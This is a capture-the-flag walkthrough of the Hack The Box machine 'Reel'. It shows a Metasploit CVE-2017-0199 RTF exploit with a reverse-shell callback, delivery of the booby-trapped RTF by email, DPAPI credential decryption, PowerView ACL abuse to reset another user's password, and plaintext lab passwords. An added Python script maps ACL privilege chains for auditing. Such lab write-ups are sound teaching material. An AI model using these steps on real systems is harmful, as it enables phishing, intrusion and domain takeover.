Lab: Hack The Box
System: Windows
Topics: basic AD operations, RTF vulnerability, PowerShell credential handling
The port scan results are as follows.
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_05-28-18 11:19PM <DIR> documents
| ftp-syst:
|_ SYST: Windows_NT
22/tcp open ssh OpenSSH 7.6 (protocol 2.0)
| ssh-hostkey:
| 2048 82:20:c3:bd:16:cb:a2:9c:88:87:1d:6c:15:59:ed:ed (RSA)
| 256 23:2b:b8:0a:8c:1c:f4:4d:8d:7e:5e:64:58:80:33:45 (ECDSA)
|_ 256 ac:8b:de:25:1d:b7:d8:38:38:9b:9c:16:bf:f6:3f:ed (ED25519)
25/tcp open smtp?
...
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2012 R2 Standard 9600 microsoft-ds (workgroup: HTB)
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49159/tcp open msrpc Microsoft Windows RPC
Host script results:
|_clock-skew: mean: -14m24s, deviation: 1s, median: -14m25s
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-time:
| date: 2024-12-16T09:15:36
|_ start_date: 2024-12-16T09:00:09
| smb-os-discovery:
| OS: Windows Server 2012 R2 Standard 9600 (Windows Server 2012 R2 Standard 6.3)
| OS CPE: cpe:/o:microsoft:windows_server_2012::-
| Computer name: REEL
| NetBIOS computer name: REEL\x00
| Domain name: HTB.LOCAL
| Forest name: HTB.LOCAL
| FQDN: REEL.HTB.LOCAL
|_ System time: 2024-12-16T09:15:35+00:00
| smb2-security-mode:
| 3:0:2:
|_ Message signing enabled and required
Based on the scan output, add HTB.LOCAL and REEL.HTB.LOCAL to hosts. Logging in to FTP anonymously, two docx files and a readme can be downloaded.
~/D/r $ftp $IP
Connected to 10.10.10.77.
220 Microsoft FTP Service
Name (10.10.10.77:kali): anonymous
...
05-28-18 11:19PM 2047 AppLocker.docx
05-28-18 01:01PM 124 readme.txt
10-31-17 09:13PM 14581 Windows Event Forwarding.docx
An email address can be obtained from the metadata of one of the docx files.
~/D/r $exiftool Windows\ Event\ Forwarding.docx
...
Creator : nico@megabank.com
Logging in to the SMTP service with telnet confirms that the email address is valid (the server accepts nico@ but rejects an unknown user).
~/D/r $telnet $IP 25
Trying 10.10.10.77...
Connected to 10.10.10.77.
Escape character is '^]'.
220 Mail Service ready
HELO softyhack
250 Hello.
MAIL FROM: <softyhack@123.com>
250 OK
RCPT TO: <nico@megabank.com>
250 OK
RCPT TO: <softyhack@megabank.com>
550 Unknown user
The readme says the target will review rtf documents, which hints at an rtf-related vulnerability.
~/D/r $cat readme.txt
please email me any rtf format procedures - I'll review and convert.
new format / converted documents will be saved here.
For rtf documents that execute malicious code, an online search turns up https://github.com/bhdresh/CVE-2017-0199. This is already integrated into msf; the module settings are as follows.
msf6 exploit(windows/fileformat/office_word_hta) > options
Module options (exploit/windows/fileformat/office_word_hta):
Name Current Setting Required Description
---- --------------- -------- -----------
FILENAME msf.rtf yes The file name.
SRVHOST 10.10.16.5 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH default.hta yes The URI to use for the HTA file
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.10.16.5 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Microsoft Office Word
View the full module info with the info, or info -d command.
msf6 exploit(windows/fileformat/office_word_hta) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf6 exploit(windows/fileformat/office_word_hta) >
[*] Started reverse TCP handler on 10.10.16.5:4444
[+] msf.rtf stored at /home/kali/.msf4/local/msf.rtf
[*] Using URL: http://10.10.16.5:8080/default.hta
[*] Server started.
Send the malicious email to the target.
~/D/r $sendEmail -f softyhack@megabank.com -t nico@megabank.com -u "subject" -m "message body" -a ~/.msf4/local/msf.rtf -s $IP -v
Dec 18 04:30:50 mykali sendEmail[113486]: DEBUG => Connecting to 10.10.10.77:25
Dec 18 04:30:50 mykali sendEmail[113486]: DEBUG => My IP address is: 10.10.16.5
Dec 18 04:30:50 mykali sendEmail[113486]: SUCCESS => Received: 220 Mail Service ready
Dec 18 04:30:50 mykali sendEmail[113486]: INFO => Sending: EHLO mykali
Dec 18 04:30:50 mykali sendEmail[113486]: SUCCESS => Received: 250-REEL, 250-SIZE 20480000, 250-AUTH LOGIN PLAIN, 250 HELP
Dec 18 04:30:50 mykali sendEmail[113486]: INFO => Sending: MAIL FROM:<softyhack@megabank.com>
Dec 18 04:30:51 mykali sendEmail[113486]: SUCCESS => Received: 250 OK
Dec 18 04:30:51 mykali sendEmail[113486]: INFO => Sending: RCPT TO:<nico@megabank.com>
Dec 18 04:30:51 mykali sendEmail[113486]: SUCCESS => Received: 250 OK
Dec 18 04:30:51 mykali sendEmail[113486]: INFO => Sending: DATA
Dec 18 04:30:51 mykali sendEmail[113486]: SUCCESS => Received: 354 OK, send.
Dec 18 04:30:51 mykali sendEmail[113486]: INFO => Sending message body
Dec 18 04:30:51 mykali sendEmail[113486]: Setting content-type: text/plain
Dec 18 04:30:51 mykali sendEmail[113486]: DEBUG => Sending the attachment [/home/kali/.msf4/local/msf.rtf]
Dec 18 04:31:03 mykali sendEmail[113486]: SUCCESS => Received: 250 Queued (12.187 seconds)
Dec 18 04:31:03 mykali sendEmail[113486]: Email was sent successfully! From: <softyhack@megabank.com> To: <nico@megabank.com> Subject: [subject] Attachment(s): [msf.rtf] Server: [10.10.10.77:25]
A reverse connection arrives in msf shortly afterwards.
C:\Windows\system32>whoami
whoami
htb\nico
c:\Users>whoami /priv
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== ========
SeShutdownPrivilege Shut down the system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
On nico's desktop there is the user flag and an xml file; view its contents.
c:\Users\nico>tree . /f
tree . /f
Folder PATH listing
Volume serial number is FFFFFFB5 CEBA:B613
C:\USERS\NICO
Contacts
Desktop
cred.xml
user.txt
...
c:\Users\nico\Desktop>type cred.xml
type cred.xml
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
<Obj RefId="0">
<TN RefId="0">
<T>System.Management.Automation.PSCredential</T>
<T>System.Object</T>
</TN>
<ToString>System.Management.Automation.PSCredential</ToString>
<Props>
<S N="UserName">HTB\Tom</S>
<SS N="Password">01000000d08c9ddf0115d1118c7a00c04fc297eb01000000e4a07bc7aaeade47925c42c8be5870730000000002000000000003660000c000000010000000d792a6f34a55235c22da98b0c041ce7b0000000004800000a00000001000000065d20f0b4ba5367e53498f0209a3319420000000d4769a161c2794e19fcefff3e9c763bb3a8790deebf51fc51062843b5d52e40214000000ac62dab09371dc4dbfd763fea92b9d5444748692</SS>
</Props>
</Obj>
</Objs>
The password of user tom can be recovered with PowerShell. The SecureString in the file was protected with DPAPI under nico's account, so running Import-CliXml as nico on this same host is enough to decrypt it.
c:\Users\nico\Desktop>powershell -c "$cred=Import-CliXml -Path cred.xml; $cred.GetNetworkCredential() |Format-List *"
powershell -c "$cred=Import-CliXml -Path cred.xml; $cred.GetNetworkCredential() |Format-List *"
UserName : Tom
Password : 1ts-mag1c!!!
SecurePassword : System.Security.SecureString
Domain : HTB
After some trial and error, this password works for tom's SSH login. After logging in, a hint is found on the desktop.
tom@REEL C:\Users\tom\Desktop\AD Audit>dir
Volume in drive C has no label.
Volume Serial Number is CEBA-B613
Directory of C:\Users\tom\Desktop\AD Audit
05/29/2018 08:02 PM <DIR> .
05/29/2018 08:02 PM <DIR> ..
05/29/2018 11:44 PM <DIR> BloodHound
05/29/2018 08:02 PM 182 note.txt
1 File(s) 182 bytes
3 Dir(s) 4,972,294,144 bytes free
tom@REEL C:\Users\tom\Desktop\AD Audit>type note.txt
Findings:
Surprisingly no AD attack paths from user to Domain Admin (using default shortest path query).
Maybe we should re-run Cypher query against other groups we've created.
tom's desktop contains AD-related material, which indicates that the way forward is through information in AD.
tom@REEL C:\Users\tom\Desktop>.\SharpHound.exe
This program is blocked by group policy. For more information, contact your system administrator.
Because of permission restrictions, SharpHound cannot be executed, so the only option is to look for clues in the acls.csv provided on the target. Filtering PrincipalName for tom finds one entry, showing that tom has WriteOwner over claire.
ObjectName | ObjectType | ObjectGuid | PrincipalName | PrincipalType | ActiveDirectoryRights | ACEType | AccessControlType | IsInherited
---|---|---|---|---|---|---|---|---
claire@HTB.LOCAL | USER | | tom@HTB.LOCAL | USER | WriteOwner | | AccessAllowed | FALSE
And user claire in turn has WriteDacl over the Backup_Admins group.
ObjectName | ObjectType | ObjectGuid | PrincipalName | PrincipalType | ActiveDirectoryRights | ACEType | AccessControlType | IsInherited
---|---|---|---|---|---|---|---|---
Backup_Admins@HTB.LOCAL | GROUP | | claire@HTB.LOCAL | USER | WriteDacl | | AccessAllowed | FALSE
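The two table lookups above are one instance of a general audit: chaining control rights across objects in an ACL export. The script below is an added example (not from the original writeup or from BloodHound) that reads rows in the acls.csv column layout shown above, keeps only ACEs that grant control over the target object, and searches for chains from a starting principal to a sensitive group; the CSV content is constructed to mirror the two entries on this page plus two rows of noise.

```python
import csv
import io
from collections import deque

# Rights that let the holder take control of the object they are granted on.
DANGEROUS_RIGHTS = {"GenericAll", "GenericWrite", "WriteOwner", "WriteDacl",
                    "ForceChangePassword", "AllExtendedRights", "Owner"}

# Constructed sample in the acls.csv layout shown above (not the real export).
# ObjectGuid and ACEType are empty for these plain object rights.
SAMPLE_CSV = """\
ObjectName,ObjectType,ObjectGuid,PrincipalName,PrincipalType,ActiveDirectoryRights,ACEType,AccessControlType,IsInherited
claire@HTB.LOCAL,USER,,tom@HTB.LOCAL,USER,WriteOwner,,AccessAllowed,FALSE
Backup_Admins@HTB.LOCAL,GROUP,,claire@HTB.LOCAL,USER,WriteDacl,,AccessAllowed,FALSE
nico@HTB.LOCAL,USER,,Domain Admins@HTB.LOCAL,GROUP,GenericAll,,AccessAllowed,TRUE
tom@HTB.LOCAL,USER,,nico@HTB.LOCAL,USER,ReadProperty,,AccessAllowed,FALSE
"""

def load_edges(text):
    """Return {principal: [(right, object), ...]} for allowed ACEs granting control rights."""
    edges = {}
    for row in csv.DictReader(io.StringIO(text)):
        if row["AccessControlType"] != "AccessAllowed":
            continue  # deny ACEs do not grant control
        if row["ActiveDirectoryRights"] not in DANGEROUS_RIGHTS:
            continue  # read-only rights such as ReadProperty are ignored
        edges.setdefault(row["PrincipalName"], []).append(
            (row["ActiveDirectoryRights"], row["ObjectName"]))
    return edges

def find_paths(edges, start, goal, max_hops=6):
    """Breadth-first search for chains of control rights from start to goal.
    Each path is a list of (principal, right, object) hops; cycles are skipped."""
    paths = []
    queue = deque([(start, [])])
    while queue:
        node, hops = queue.popleft()
        if len(hops) >= max_hops:
            continue
        visited = {start} | {target for _, _, target in hops}
        for right, target in edges.get(node, []):
            if target in visited:
                continue
            new_hops = hops + [(node, right, target)]
            if target == goal:
                paths.append(new_hops)
            else:
                queue.append((target, new_hops))
    return paths

def render(hops):
    """Render a path as 'A --Right--> B --Right--> C'."""
    return hops[0][0] + "".join(f" --{r}--> {t}" for _, r, t in hops)

if __name__ == "__main__":
    acl_edges = load_edges(SAMPLE_CSV)
    for p in find_paths(acl_edges, "tom@HTB.LOCAL", "Backup_Admins@HTB.LOCAL"):
        print(render(p))
```

Run against a real export, the same search over every low-privileged principal lists which ACEs to remove so that no such chain reaches a privileged group.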
Since modifying the objects remotely with BloodyAD does not work, and an uploaded SharpHound.exe or ps1 cannot be executed either, the only option is the PowerView.ps1 that ships on the target in tom\Desktop. Run the following commands in order.
. .\PowerView.ps1
Set-DomainObjectOwner -Identity claire -OwnerIdentity tom
Add-DomainObjectAcl -TargetIdentity claire -PrincipalIdentity tom -Rights ResetPassword -Verbose
$pass = ConvertTo-SecureString 'P@ssw0rd_' -AsPlainText -Force
Set-DomainUserPassword -Identity claire -AccountPassword $pass -Verbose
If the last step succeeds, the following is shown.
PS C:\users\tom\desktop\AD Audit\BloodHound> Set-DomainUserPassword -Identity claire -AccountPassword $pass -Verbose
VERBOSE: [Set-DomainUserPassword] Attempting to set the password for user 'claire'
VERBOSE: [Set-DomainUserPassword] Password for user 'claire' successfully reset
Now it is possible to log in via SSH as claire with the new password. The following steps have to be done quickly, because the machine appears to reset every little while and claire's password is changed back. Finally, the password is found in a file under Administrator\Desktop.
~/D/r $ssh claire@$IP
claire@REEL C:\Users\Administrator\Desktop> net group Backup_Admins claire /add /domain
The command completed successfully.
claire@REEL C:\Users\Administrator\Desktop>cd "Backup Scripts"
claire@REEL C:\Users\Administrator\Desktop\Backup Scripts>dir
Volume in drive C has no label.
Volume Serial Number is CEBA-B613
Directory of C:\Users\Administrator\Desktop\Backup Scripts
11/02/2017 09:47 PM <DIR> .
11/02/2017 09:47 PM <DIR> ..
11/03/2017 11:22 PM 845 backup.ps1
11/02/2017 09:37 PM 462 backup1.ps1
11/03/2017 11:21 PM 5,642 BackupScript.ps1
11/02/2017 09:43 PM 2,791 BackupScript.zip
11/03/2017 11:22 PM 1,855 folders-system-state.txt
11/03/2017 11:22 PM 308 test2.ps1.txt
6 File(s) 11,903 bytes
2 Dir(s) 4,970,246,144 bytes free
claire@REEL C:\Users\Administrator\Desktop\Backup Scripts>powershell
Windows PowerShell
Copyright (C) 2014 Microsoft Corporation. All rights reserved.
PS C:\Users\Administrator\Desktop\Backup Scripts> type * | findstr 'password'
# admin password
$password="Cr4ckMeIfYouC4n!"